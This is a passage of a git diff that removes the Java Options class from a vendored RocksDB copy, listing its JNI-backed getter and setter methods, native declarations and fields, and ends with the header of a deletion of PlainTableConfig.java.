-    return allow2pc(nativeHandle_);
-  }
-
-  @Override
-  public Options setRowCache(final Cache rowCache) {
-    assert(isOwningHandle());
-    setRowCache(nativeHandle_, rowCache.nativeHandle_);
-    this.rowCache_ = rowCache;
-    return this;
-  }
-
-  @Override
-  public Cache rowCache() {
-    assert(isOwningHandle());
-    return this.rowCache_;
-  }
-
-  @Override
-  public Options setFailIfOptionsFileError(final boolean failIfOptionsFileError) {
-    assert(isOwningHandle());
-    setFailIfOptionsFileError(nativeHandle_, failIfOptionsFileError);
-    return this;
-  }
-
-  @Override
-  public boolean failIfOptionsFileError() {
-    assert(isOwningHandle());
-    return failIfOptionsFileError(nativeHandle_);
-  }
-
-  @Override
-  public Options setDumpMallocStats(final boolean dumpMallocStats) {
-    assert(isOwningHandle());
-    setDumpMallocStats(nativeHandle_, dumpMallocStats);
-    return this;
-  }
-
-  @Override
-  public boolean dumpMallocStats() {
-    assert(isOwningHandle());
-    return dumpMallocStats(nativeHandle_);
-  }
-
-  @Override
-  public Options setAvoidFlushDuringRecovery(final boolean avoidFlushDuringRecovery) {
-    assert(isOwningHandle());
-    setAvoidFlushDuringRecovery(nativeHandle_, avoidFlushDuringRecovery);
-    return this;
-  }
-
-  @Override
-  public boolean avoidFlushDuringRecovery() {
-    assert(isOwningHandle());
-    return avoidFlushDuringRecovery(nativeHandle_);
-  }
-
-  @Override
-  public Options setAvoidFlushDuringShutdown(final boolean avoidFlushDuringShutdown) {
-    assert(isOwningHandle());
-    setAvoidFlushDuringShutdown(nativeHandle_, avoidFlushDuringShutdown);
-    return this;
-  }
-
-  @Override
-  public boolean avoidFlushDuringShutdown() {
-    assert(isOwningHandle());
-    return avoidFlushDuringShutdown(nativeHandle_);
-  }
-
-  @Override
-  public MemTableConfig memTableConfig() {
-    return this.memTableConfig_;
-  }
-
-  @Override
-  public Options setMemTableConfig(final MemTableConfig config) {
-    memTableConfig_ = config;
-    setMemTableFactory(nativeHandle_, config.newMemTableFactoryHandle());
-    return this;
-  }
-
-  @Override
-  public Options setRateLimiter(final RateLimiter rateLimiter) {
-    assert(isOwningHandle());
-    rateLimiter_ = rateLimiter;
-    setRateLimiter(nativeHandle_, rateLimiter.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Options setLogger(final Logger logger) {
-    assert(isOwningHandle());
-    setLogger(nativeHandle_, logger.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Options setInfoLogLevel(final InfoLogLevel infoLogLevel) {
-    assert(isOwningHandle());
-    setInfoLogLevel(nativeHandle_, infoLogLevel.getValue());
-    return this;
-  }
-
-  @Override
-  public InfoLogLevel infoLogLevel() {
-    assert(isOwningHandle());
-    return InfoLogLevel.getInfoLogLevel(
-        infoLogLevel(nativeHandle_));
-  }
-
-  @Override
-  public String memTableFactoryName() {
-    assert(isOwningHandle());
-    return memTableFactoryName(nativeHandle_);
-  }
-
-  @Override
-  public TableFormatConfig tableFormatConfig() {
-    return this.tableFormatConfig_;
-  }
-
-  @Override
-  public Options setTableFormatConfig(final TableFormatConfig config) {
-    tableFormatConfig_ = config;
-    setTableFactory(nativeHandle_, config.newTableFactoryHandle());
-    return this;
-  }
-
-  @Override
-  public String tableFactoryName() {
-    assert(isOwningHandle());
-    return tableFactoryName(nativeHandle_);
-  }
-
-  @Override
-  public Options useFixedLengthPrefixExtractor(final int n) {
-    assert(isOwningHandle());
-    useFixedLengthPrefixExtractor(nativeHandle_, n);
-    return this;
-  }
-
-  @Override
-  public Options useCappedPrefixExtractor(final int n) {
-    assert(isOwningHandle());
-    useCappedPrefixExtractor(nativeHandle_, n);
-    return this;
-  }
-
-  @Override
-  public CompressionType compressionType() {
-    return CompressionType.getCompressionType(compressionType(nativeHandle_));
-  }
-
-  @Override
-  public Options setCompressionPerLevel(
-      final List<CompressionType> compressionLevels) {
-    final byte[] byteCompressionTypes = new byte[
-        compressionLevels.size()];
-    for (int i = 0; i < compressionLevels.size(); i++) {
-      byteCompressionTypes[i] = compressionLevels.get(i).getValue();
-    }
-    setCompressionPerLevel(nativeHandle_, byteCompressionTypes);
-    return this;
-  }
-
-  @Override
-  public List<CompressionType> compressionPerLevel() {
-    final byte[] byteCompressionTypes =
-        compressionPerLevel(nativeHandle_);
-    final List<CompressionType> compressionLevels = new ArrayList<>();
-    for (final Byte byteCompressionType : byteCompressionTypes) {
-      compressionLevels.add(CompressionType.getCompressionType(
-          byteCompressionType));
-    }
-    return compressionLevels;
-  }
-
-  @Override
-  public Options setCompressionType(CompressionType compressionType) {
-    setCompressionType(nativeHandle_, compressionType.getValue());
-    return this;
-  }
-
-
-  @Override
-  public Options setBottommostCompressionType(
-      final CompressionType bottommostCompressionType) {
-    setBottommostCompressionType(nativeHandle_,
-        bottommostCompressionType.getValue());
-    return this;
-  }
-
-  @Override
-  public CompressionType bottommostCompressionType() {
-    return CompressionType.getCompressionType(
-        bottommostCompressionType(nativeHandle_));
-  }
-
-  @Override
-  public Options setCompressionOptions(
-      final CompressionOptions compressionOptions) {
-    setCompressionOptions(nativeHandle_, compressionOptions.nativeHandle_);
-    this.compressionOptions_ = compressionOptions;
-    return this;
-  }
-
-  @Override
-  public CompressionOptions compressionOptions() {
-    return this.compressionOptions_;
-  }
-
-  @Override
-  public CompactionStyle compactionStyle() {
-    return CompactionStyle.values()[compactionStyle(nativeHandle_)];
-  }
-
-  @Override
-  public Options setCompactionStyle(
-      final CompactionStyle compactionStyle) {
-    setCompactionStyle(nativeHandle_, compactionStyle.getValue());
-    return this;
-  }
-
-  @Override
-  public int numLevels() {
-    return numLevels(nativeHandle_);
-  }
-
-  @Override
-  public Options setNumLevels(int numLevels) {
-    setNumLevels(nativeHandle_, numLevels);
-    return this;
-  }
-
-  @Override
-  public int levelZeroFileNumCompactionTrigger() {
-    return levelZeroFileNumCompactionTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevelZeroFileNumCompactionTrigger(
-      final int numFiles) {
-    setLevelZeroFileNumCompactionTrigger(
-        nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public int levelZeroSlowdownWritesTrigger() {
-    return levelZeroSlowdownWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevelZeroSlowdownWritesTrigger(
-      final int numFiles) {
-    setLevelZeroSlowdownWritesTrigger(nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public int levelZeroStopWritesTrigger() {
-    return levelZeroStopWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevelZeroStopWritesTrigger(
-      final int numFiles) {
-    setLevelZeroStopWritesTrigger(nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public long targetFileSizeBase() {
-    return targetFileSizeBase(nativeHandle_);
-  }
-
-  @Override
-  public Options setTargetFileSizeBase(long targetFileSizeBase) {
-    setTargetFileSizeBase(nativeHandle_, targetFileSizeBase);
-    return this;
-  }
-
-  @Override
-  public int targetFileSizeMultiplier() {
-    return targetFileSizeMultiplier(nativeHandle_);
-  }
-
-  @Override
-  public Options setTargetFileSizeMultiplier(int multiplier) {
-    setTargetFileSizeMultiplier(nativeHandle_, multiplier);
-    return this;
-  }
-
-  @Override
-  public Options setMaxBytesForLevelBase(final long maxBytesForLevelBase) {
-    setMaxBytesForLevelBase(nativeHandle_, maxBytesForLevelBase);
-    return this;
-  }
-
-  @Override
-  public long maxBytesForLevelBase() {
-    return maxBytesForLevelBase(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevelCompactionDynamicLevelBytes(
-      final boolean enableLevelCompactionDynamicLevelBytes) {
-    setLevelCompactionDynamicLevelBytes(nativeHandle_,
-        enableLevelCompactionDynamicLevelBytes);
-    return this;
-  }
-
-  @Override
-  public boolean levelCompactionDynamicLevelBytes() {
-    return levelCompactionDynamicLevelBytes(nativeHandle_);
-  }
-
-  @Override
-  public double maxBytesForLevelMultiplier() {
-    return maxBytesForLevelMultiplier(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxBytesForLevelMultiplier(final double multiplier) {
-    setMaxBytesForLevelMultiplier(nativeHandle_, multiplier);
-    return this;
-  }
-
-  @Override
-  public long maxCompactionBytes() {
-    return maxCompactionBytes(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxCompactionBytes(final long maxCompactionBytes) {
-    setMaxCompactionBytes(nativeHandle_, maxCompactionBytes);
-    return this;
-  }
-
-  @Override
-  public long arenaBlockSize() {
-    return arenaBlockSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setArenaBlockSize(final long arenaBlockSize) {
-    setArenaBlockSize(nativeHandle_, arenaBlockSize);
-    return this;
-  }
-
-  @Override
-  public boolean disableAutoCompactions() {
-    return disableAutoCompactions(nativeHandle_);
-  }
-
-  @Override
-  public Options setDisableAutoCompactions(
-      final boolean disableAutoCompactions) {
-    setDisableAutoCompactions(nativeHandle_, disableAutoCompactions);
-    return this;
-  }
-
-  @Override
-  public long maxSequentialSkipInIterations() {
-    return maxSequentialSkipInIterations(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxSequentialSkipInIterations(
-      final long maxSequentialSkipInIterations) {
-    setMaxSequentialSkipInIterations(nativeHandle_,
-        maxSequentialSkipInIterations);
-    return this;
-  }
-
-  @Override
-  public boolean inplaceUpdateSupport() {
-    return inplaceUpdateSupport(nativeHandle_);
-  }
-
-  @Override
-  public Options setInplaceUpdateSupport(
-      final boolean inplaceUpdateSupport) {
-    setInplaceUpdateSupport(nativeHandle_, inplaceUpdateSupport);
-    return this;
-  }
-
-  @Override
-  public long inplaceUpdateNumLocks() {
-    return inplaceUpdateNumLocks(nativeHandle_);
-  }
-
-  @Override
-  public Options setInplaceUpdateNumLocks(
-      final long inplaceUpdateNumLocks) {
-    setInplaceUpdateNumLocks(nativeHandle_, inplaceUpdateNumLocks);
-    return this;
-  }
-
-  @Override
-  public double memtablePrefixBloomSizeRatio() {
-    return memtablePrefixBloomSizeRatio(nativeHandle_);
-  }
-
-  @Override
-  public Options setMemtablePrefixBloomSizeRatio(final double memtablePrefixBloomSizeRatio) {
-    setMemtablePrefixBloomSizeRatio(nativeHandle_, memtablePrefixBloomSizeRatio);
-    return this;
-  }
-
-  @Override
-  public int bloomLocality() {
-    return bloomLocality(nativeHandle_);
-  }
-
-  @Override
-  public Options setBloomLocality(final int bloomLocality) {
-    setBloomLocality(nativeHandle_, bloomLocality);
-    return this;
-  }
-
-  @Override
-  public long maxSuccessiveMerges() {
-    return maxSuccessiveMerges(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxSuccessiveMerges(long maxSuccessiveMerges) {
-    setMaxSuccessiveMerges(nativeHandle_, maxSuccessiveMerges);
-    return this;
-  }
-
-  @Override
-  public int minWriteBufferNumberToMerge() {
-    return minWriteBufferNumberToMerge(nativeHandle_);
-  }
-
-  @Override
-  public Options setMinWriteBufferNumberToMerge(
-      final int minWriteBufferNumberToMerge) {
-    setMinWriteBufferNumberToMerge(nativeHandle_, minWriteBufferNumberToMerge);
-    return this;
-  }
-
-  @Override
-  public Options setOptimizeFiltersForHits(
-      final boolean optimizeFiltersForHits) {
-    setOptimizeFiltersForHits(nativeHandle_, optimizeFiltersForHits);
-    return this;
-  }
-
-  @Override
-  public boolean optimizeFiltersForHits() {
-    return optimizeFiltersForHits(nativeHandle_);
-  }
-
-  @Override
-  public Options
-  setMemtableHugePageSize(
-      long memtableHugePageSize) {
-    setMemtableHugePageSize(nativeHandle_,
-        memtableHugePageSize);
-    return this;
-  }
-
-  @Override
-  public long memtableHugePageSize() {
-    return memtableHugePageSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setSoftPendingCompactionBytesLimit(long softPendingCompactionBytesLimit) {
-    setSoftPendingCompactionBytesLimit(nativeHandle_,
-        softPendingCompactionBytesLimit);
-    return this;
-  }
-
-  @Override
-  public long softPendingCompactionBytesLimit() {
-    return softPendingCompactionBytesLimit(nativeHandle_);
-  }
-
-  @Override
-  public Options setHardPendingCompactionBytesLimit(long hardPendingCompactionBytesLimit) {
-    setHardPendingCompactionBytesLimit(nativeHandle_, hardPendingCompactionBytesLimit);
-    return this;
-  }
-
-  @Override
-  public long hardPendingCompactionBytesLimit() {
-    return hardPendingCompactionBytesLimit(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevel0FileNumCompactionTrigger(int level0FileNumCompactionTrigger) {
-    setLevel0FileNumCompactionTrigger(nativeHandle_, level0FileNumCompactionTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0FileNumCompactionTrigger() {
-    return level0FileNumCompactionTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevel0SlowdownWritesTrigger(int level0SlowdownWritesTrigger) {
-    setLevel0SlowdownWritesTrigger(nativeHandle_, level0SlowdownWritesTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0SlowdownWritesTrigger() {
-    return level0SlowdownWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevel0StopWritesTrigger(int level0StopWritesTrigger) {
-    setLevel0StopWritesTrigger(nativeHandle_, level0StopWritesTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0StopWritesTrigger() {
-    return level0StopWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxBytesForLevelMultiplierAdditional(int[] maxBytesForLevelMultiplierAdditional) {
-    setMaxBytesForLevelMultiplierAdditional(nativeHandle_, maxBytesForLevelMultiplierAdditional);
-    return this;
-  }
-
-  @Override
-  public int[] maxBytesForLevelMultiplierAdditional() {
-    return maxBytesForLevelMultiplierAdditional(nativeHandle_);
-  }
-
-  @Override
-  public Options setParanoidFileChecks(boolean paranoidFileChecks) {
-    setParanoidFileChecks(nativeHandle_, paranoidFileChecks);
-    return this;
-  }
-
-  @Override
-  public boolean paranoidFileChecks() {
-    return paranoidFileChecks(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxWriteBufferNumberToMaintain(
-      final int maxWriteBufferNumberToMaintain) {
-    setMaxWriteBufferNumberToMaintain(
-        nativeHandle_, maxWriteBufferNumberToMaintain);
-    return this;
-  }
-
-  @Override
-  public int maxWriteBufferNumberToMaintain() {
-    return maxWriteBufferNumberToMaintain(nativeHandle_);
-  }
-
-  @Override
-  public Options setCompactionPriority(
-      final CompactionPriority compactionPriority) {
-    setCompactionPriority(nativeHandle_, compactionPriority.getValue());
-    return this;
-  }
-
-  @Override
-  public CompactionPriority compactionPriority() {
-    return CompactionPriority.getCompactionPriority(
-        compactionPriority(nativeHandle_));
-  }
-
-  @Override
-  public Options setReportBgIoStats(final boolean reportBgIoStats) {
-    setReportBgIoStats(nativeHandle_, reportBgIoStats);
-    return this;
-  }
-
-  @Override
-  public boolean reportBgIoStats() {
-    return reportBgIoStats(nativeHandle_);
-  }
-
-  @Override
-  public Options setCompactionOptionsUniversal(
-      final CompactionOptionsUniversal compactionOptionsUniversal) {
-    setCompactionOptionsUniversal(nativeHandle_,
-        compactionOptionsUniversal.nativeHandle_);
-    this.compactionOptionsUniversal_ = compactionOptionsUniversal;
-    return this;
-  }
-
-  @Override
-  public CompactionOptionsUniversal compactionOptionsUniversal() {
-    return this.compactionOptionsUniversal_;
-  }
-
-  @Override
-  public Options setCompactionOptionsFIFO(final CompactionOptionsFIFO compactionOptionsFIFO) {
-    setCompactionOptionsFIFO(nativeHandle_,
-        compactionOptionsFIFO.nativeHandle_);
-    this.compactionOptionsFIFO_ = compactionOptionsFIFO;
-    return this;
-  }
-
-  @Override
-  public CompactionOptionsFIFO compactionOptionsFIFO() {
-    return this.compactionOptionsFIFO_;
-  }
-
-  @Override
-  public Options setForceConsistencyChecks(final boolean forceConsistencyChecks) {
-    setForceConsistencyChecks(nativeHandle_, forceConsistencyChecks);
-    return this;
-  }
-
-  @Override
-  public boolean forceConsistencyChecks() {
-    return forceConsistencyChecks(nativeHandle_);
-  }
-
-  private native static long newOptions();
-  private native static long newOptions(long dbOptHandle,
-      long cfOptHandle);
-  @Override protected final native void disposeInternal(final long handle);
-  private native void setEnv(long optHandle, long envHandle);
-  private native void prepareForBulkLoad(long handle);
-
-  // DB native handles
-  private native void setIncreaseParallelism(long handle, int totalThreads);
-  private native void setCreateIfMissing(long handle, boolean flag);
-  private native boolean createIfMissing(long handle);
-  private native void setCreateMissingColumnFamilies(
-      long handle, boolean flag);
-  private native boolean createMissingColumnFamilies(long handle);
-  private native void setErrorIfExists(long handle, boolean errorIfExists);
-  private native boolean errorIfExists(long handle);
-  private native void setParanoidChecks(
-      long handle, boolean paranoidChecks);
-  private native boolean paranoidChecks(long handle);
-  private native void setRateLimiter(long handle,
-      long rateLimiterHandle);
-  private native void setLogger(long handle,
-      long loggerHandle);
-  private native void setInfoLogLevel(long handle, byte logLevel);
-  private native byte infoLogLevel(long handle);
-  private native void setMaxOpenFiles(long handle, int maxOpenFiles);
-  private native int maxOpenFiles(long handle);
-  private native void setMaxTotalWalSize(long handle,
-      long maxTotalWalSize);
-  private native void setMaxFileOpeningThreads(final long handle,
-      final int maxFileOpeningThreads);
-  private native int maxFileOpeningThreads(final long handle);
-  private native long maxTotalWalSize(long handle);
-  private native void setStatistics(final long handle, final long statisticsHandle);
-  private native long statistics(final long handle);
-  private native boolean useFsync(long handle);
-  private native void setUseFsync(long handle, boolean useFsync);
-  private native void setDbPaths(final long handle, final String[] paths,
-      final long[] targetSizes);
-  private native long dbPathsLen(final long handle);
-  private native void dbPaths(final long handle, final String[] paths,
-      final long[] targetSizes);
-  private native void setDbLogDir(long handle, String dbLogDir);
-  private native String dbLogDir(long handle);
-  private native void setWalDir(long handle, String walDir);
-  private native String walDir(long handle);
-  private native void setDeleteObsoleteFilesPeriodMicros(
-      long handle, long micros);
-  private native long deleteObsoleteFilesPeriodMicros(long handle);
-  private native void setBaseBackgroundCompactions(long handle,
-      int baseBackgroundCompactions);
-  private native int baseBackgroundCompactions(long handle);
-  private native void setMaxBackgroundCompactions(
-      long handle, int maxBackgroundCompactions);
-  private native int maxBackgroundCompactions(long handle);
-  private native void setMaxSubcompactions(long handle, int maxSubcompactions);
-  private native int maxSubcompactions(long handle);
-  private native void setMaxBackgroundFlushes(
-      long handle, int maxBackgroundFlushes);
-  private native int maxBackgroundFlushes(long handle);
-  private native void setMaxLogFileSize(long handle, long maxLogFileSize)
-      throws IllegalArgumentException;
-  private native long maxLogFileSize(long handle);
-  private native void setLogFileTimeToRoll(
-      long handle, long logFileTimeToRoll) throws IllegalArgumentException;
-  private native long logFileTimeToRoll(long handle);
-  private native void setKeepLogFileNum(long handle, long keepLogFileNum)
-      throws IllegalArgumentException;
-  private native long keepLogFileNum(long handle);
-  private native void setRecycleLogFileNum(long handle, long recycleLogFileNum);
-  private native long recycleLogFileNum(long handle);
-  private native void setMaxManifestFileSize(
-      long handle, long maxManifestFileSize);
-  private native long maxManifestFileSize(long handle);
-  private native void setMaxTableFilesSizeFIFO(
-      long handle, long maxTableFilesSize);
-  private native long maxTableFilesSizeFIFO(long handle);
-  private native void setTableCacheNumshardbits(
-      long handle, int tableCacheNumshardbits);
-  private native int tableCacheNumshardbits(long handle);
-  private native void setWalTtlSeconds(long handle, long walTtlSeconds);
-  private native long walTtlSeconds(long handle);
-  private native void setWalSizeLimitMB(long handle, long sizeLimitMB);
-  private native long walSizeLimitMB(long handle);
-  private native void setManifestPreallocationSize(
-      long handle, long size) throws IllegalArgumentException;
-  private native long manifestPreallocationSize(long handle);
-  private native void setUseDirectReads(long handle, boolean useDirectReads);
-  private native boolean useDirectReads(long handle);
-  private native void setUseDirectIoForFlushAndCompaction(
-      long handle, boolean useDirectIoForFlushAndCompaction);
-  private native boolean useDirectIoForFlushAndCompaction(long handle);
-  private native void setAllowFAllocate(final long handle,
-      final boolean allowFAllocate);
-  private native boolean allowFAllocate(final long handle);
-  private native void setAllowMmapReads(
-      long handle, boolean allowMmapReads);
-  private native boolean allowMmapReads(long handle);
-  private native void setAllowMmapWrites(
-      long handle, boolean allowMmapWrites);
-  private native boolean allowMmapWrites(long handle);
-  private native void setIsFdCloseOnExec(
-      long handle, boolean isFdCloseOnExec);
-  private native boolean isFdCloseOnExec(long handle);
-  private native void setStatsDumpPeriodSec(
-      long handle, int statsDumpPeriodSec);
-  private native int statsDumpPeriodSec(long handle);
-  private native void setAdviseRandomOnOpen(
-      long handle, boolean adviseRandomOnOpen);
-  private native boolean adviseRandomOnOpen(long handle);
-  private native void setDbWriteBufferSize(final long handle,
-      final long dbWriteBufferSize);
-  private native long dbWriteBufferSize(final long handle);
-  private native void setAccessHintOnCompactionStart(final long handle,
-      final byte accessHintOnCompactionStart);
-  private native byte accessHintOnCompactionStart(final long handle);
-  private native void setNewTableReaderForCompactionInputs(final long handle,
-      final boolean newTableReaderForCompactionInputs);
-  private native boolean newTableReaderForCompactionInputs(final long handle);
-  private native void setCompactionReadaheadSize(final long handle,
-      final long compactionReadaheadSize);
-  private native long compactionReadaheadSize(final long handle);
-  private native void setRandomAccessMaxBufferSize(final long handle,
-      final long randomAccessMaxBufferSize);
-  private native long randomAccessMaxBufferSize(final long handle);
-  private native void setWritableFileMaxBufferSize(final long handle,
-      final long writableFileMaxBufferSize);
-  private native long writableFileMaxBufferSize(final long handle);
-  private native void setUseAdaptiveMutex(
-      long handle, boolean useAdaptiveMutex);
-  private native boolean useAdaptiveMutex(long handle);
-  private native void setBytesPerSync(
-      long handle, long bytesPerSync);
-  private native long bytesPerSync(long handle);
-  private native void setWalBytesPerSync(long handle, long walBytesPerSync);
-  private native long walBytesPerSync(long handle);
-  private native void setEnableThreadTracking(long handle,
-      boolean enableThreadTracking);
-  private native boolean enableThreadTracking(long handle);
-  private native void setDelayedWriteRate(long handle, long delayedWriteRate);
-  private native long delayedWriteRate(long handle);
-  private native void setAllowConcurrentMemtableWrite(long handle,
-      boolean allowConcurrentMemtableWrite);
-  private native boolean allowConcurrentMemtableWrite(long handle);
-  private native void setEnableWriteThreadAdaptiveYield(long handle,
-      boolean enableWriteThreadAdaptiveYield);
-  private native boolean enableWriteThreadAdaptiveYield(long handle);
-  private native void setWriteThreadMaxYieldUsec(long handle,
-      long writeThreadMaxYieldUsec);
-  private native long writeThreadMaxYieldUsec(long handle);
-  private native void setWriteThreadSlowYieldUsec(long handle,
-      long writeThreadSlowYieldUsec);
-  private native long writeThreadSlowYieldUsec(long handle);
-  private native void setSkipStatsUpdateOnDbOpen(final long handle,
-      final boolean skipStatsUpdateOnDbOpen);
-  private native boolean skipStatsUpdateOnDbOpen(final long handle);
-  private native void setWalRecoveryMode(final long handle,
-      final byte walRecoveryMode);
-  private native byte walRecoveryMode(final long handle);
-  private native void setAllow2pc(final long handle,
-      final boolean allow2pc);
-  private native boolean allow2pc(final long handle);
-  private native void setRowCache(final long handle,
-      final long row_cache_handle);
-  private native void setFailIfOptionsFileError(final long handle,
-      final boolean failIfOptionsFileError);
-  private native boolean failIfOptionsFileError(final long handle);
-  private native void setDumpMallocStats(final long handle,
-      final boolean dumpMallocStats);
-  private native boolean dumpMallocStats(final long handle);
-  private native void setAvoidFlushDuringRecovery(final long handle,
-      final boolean avoidFlushDuringRecovery);
-  private native boolean avoidFlushDuringRecovery(final long handle);
-  private native void setAvoidFlushDuringShutdown(final long handle,
-      final boolean avoidFlushDuringShutdown);
-  private native boolean avoidFlushDuringShutdown(final long handle);
-
-  // CF native handles
-  private native void optimizeForSmallDb(final long handle);
-  private native void optimizeForPointLookup(long handle,
-      long blockCacheSizeMb);
-  private native void optimizeLevelStyleCompaction(long handle,
-      long memtableMemoryBudget);
-  private native void optimizeUniversalStyleCompaction(long handle,
-      long memtableMemoryBudget);
-  private native void setComparatorHandle(long handle, int builtinComparator);
-  private native void setComparatorHandle(long optHandle,
-      long comparatorHandle);
-  private native void setMergeOperatorName(
-      long handle, String name);
-  private native void setMergeOperator(
-      long handle, long mergeOperatorHandle);
-  private native void setWriteBufferSize(long handle, long writeBufferSize)
-      throws IllegalArgumentException;
-  private native long writeBufferSize(long handle);
-  private native void setMaxWriteBufferNumber(
-      long handle, int maxWriteBufferNumber);
-  private native int maxWriteBufferNumber(long handle);
-  private native void setMinWriteBufferNumberToMerge(
-      long handle, int minWriteBufferNumberToMerge);
-  private native int minWriteBufferNumberToMerge(long handle);
-  private native void setCompressionType(long handle, byte compressionType);
-  private native byte compressionType(long handle);
-  private native void setCompressionPerLevel(long handle,
-      byte[] compressionLevels);
-  private native byte[] compressionPerLevel(long handle);
-  private native void setBottommostCompressionType(long handle,
-      byte bottommostCompressionType);
-  private native byte bottommostCompressionType(long handle);
-  private native void setCompressionOptions(long handle,
-      long compressionOptionsHandle);
-  private native void useFixedLengthPrefixExtractor(
-      long handle, int prefixLength);
-  private native void useCappedPrefixExtractor(
-      long handle, int prefixLength);
-  private native void setNumLevels(
-      long handle, int numLevels);
-  private native int numLevels(long handle);
-  private native void setLevelZeroFileNumCompactionTrigger(
-      long handle, int numFiles);
-  private native int levelZeroFileNumCompactionTrigger(long handle);
-  private native void setLevelZeroSlowdownWritesTrigger(
-      long handle, int numFiles);
-  private native int levelZeroSlowdownWritesTrigger(long handle);
-  private native void setLevelZeroStopWritesTrigger(
-      long handle, int numFiles);
-  private native int levelZeroStopWritesTrigger(long handle);
-  private native void setTargetFileSizeBase(
-      long handle, long targetFileSizeBase);
-  private native long targetFileSizeBase(long handle);
-  private native void setTargetFileSizeMultiplier(
-      long handle, int multiplier);
-  private native int targetFileSizeMultiplier(long handle);
-  private native void setMaxBytesForLevelBase(
-      long handle, long maxBytesForLevelBase);
-  private native long maxBytesForLevelBase(long handle);
-  private native void setLevelCompactionDynamicLevelBytes(
-      long handle, boolean enableLevelCompactionDynamicLevelBytes);
-  private native boolean levelCompactionDynamicLevelBytes(
-      long handle);
-  private native void setMaxBytesForLevelMultiplier(long handle, double multiplier);
-  private native double maxBytesForLevelMultiplier(long handle);
-  private native void setMaxCompactionBytes(long handle, long maxCompactionBytes);
-  private native long maxCompactionBytes(long handle);
-  private native void setArenaBlockSize(
-      long handle, long arenaBlockSize) throws IllegalArgumentException;
-  private native long arenaBlockSize(long handle);
-  private native void setDisableAutoCompactions(
-      long handle, boolean disableAutoCompactions);
-  private native boolean disableAutoCompactions(long handle);
-  private native void setCompactionStyle(long handle, byte compactionStyle);
-  private native byte compactionStyle(long handle);
-  private native void setMaxSequentialSkipInIterations(
-      long handle, long maxSequentialSkipInIterations);
-  private native long maxSequentialSkipInIterations(long handle);
-  private native void setMemTableFactory(long handle, long factoryHandle);
-  private native String memTableFactoryName(long handle);
-  private native void setTableFactory(long handle, long factoryHandle);
-  private native String tableFactoryName(long handle);
-  private native void setInplaceUpdateSupport(
-      long handle, boolean inplaceUpdateSupport);
-  private native boolean inplaceUpdateSupport(long handle);
-  private native void setInplaceUpdateNumLocks(
-      long handle, long inplaceUpdateNumLocks)
-      throws IllegalArgumentException;
-  private native long inplaceUpdateNumLocks(long handle);
-  private native void setMemtablePrefixBloomSizeRatio(
-      long handle, double memtablePrefixBloomSizeRatio);
-  private native double memtablePrefixBloomSizeRatio(long handle);
-  private native void setBloomLocality(
-      long handle, int bloomLocality);
-  private native int bloomLocality(long handle);
-  private native void setMaxSuccessiveMerges(
-      long handle, long maxSuccessiveMerges)
-      throws IllegalArgumentException;
-  private native long maxSuccessiveMerges(long handle);
-  private native void setOptimizeFiltersForHits(long handle,
-      boolean optimizeFiltersForHits);
-  private native boolean optimizeFiltersForHits(long handle);
-  private native void setMemtableHugePageSize(long handle,
-      long memtableHugePageSize);
-  private native long memtableHugePageSize(long handle);
-  private native void setSoftPendingCompactionBytesLimit(long handle,
-      long softPendingCompactionBytesLimit);
-  private native long softPendingCompactionBytesLimit(long handle);
-  private native void setHardPendingCompactionBytesLimit(long handle,
-      long hardPendingCompactionBytesLimit);
-  private native long hardPendingCompactionBytesLimit(long handle);
-  private native void setLevel0FileNumCompactionTrigger(long handle,
-      int level0FileNumCompactionTrigger);
-  private native int level0FileNumCompactionTrigger(long handle);
-  private native void setLevel0SlowdownWritesTrigger(long handle,
-      int level0SlowdownWritesTrigger);
-  private native int level0SlowdownWritesTrigger(long handle);
-  private native void setLevel0StopWritesTrigger(long handle,
-      int level0StopWritesTrigger);
-  private native int level0StopWritesTrigger(long handle);
-  private native void setMaxBytesForLevelMultiplierAdditional(long handle,
-      int[] maxBytesForLevelMultiplierAdditional);
-  private native int[] maxBytesForLevelMultiplierAdditional(long handle);
-  private native void setParanoidFileChecks(long handle,
-      boolean paranoidFileChecks);
-  private native boolean paranoidFileChecks(long handle);
-  private native void setMaxWriteBufferNumberToMaintain(final long handle,
-      final int maxWriteBufferNumberToMaintain);
-  private native int maxWriteBufferNumberToMaintain(final long handle);
-  private native void setCompactionPriority(final long handle,
-      final byte compactionPriority);
-  private native byte compactionPriority(final long handle);
-  private native void setReportBgIoStats(final long handle,
-      final boolean reportBgIoStats);
-  private native boolean reportBgIoStats(final long handle);
-  private native void setCompactionOptionsUniversal(final long handle,
-      final long compactionOptionsUniversalHandle);
-  private native void setCompactionOptionsFIFO(final long handle,
-      final long compactionOptionsFIFOHandle);
-  private native void setForceConsistencyChecks(final long handle,
-      final boolean forceConsistencyChecks);
-  private native boolean forceConsistencyChecks(final long handle);
-
-  // instance variables
-  private Env env_;
-  private MemTableConfig memTableConfig_;
-  private TableFormatConfig tableFormatConfig_;
-  private RateLimiter rateLimiter_;
-  private AbstractComparator<? extends AbstractSlice<?>> comparator_;
-  private CompactionOptionsUniversal compactionOptionsUniversal_;
-  private CompactionOptionsFIFO compactionOptionsFIFO_;
-  private CompressionOptions compressionOptions_;
-  private Cache rowCache_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/PlainTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/PlainTableConfig.java
deleted file mode 100644
index c099981..0000000
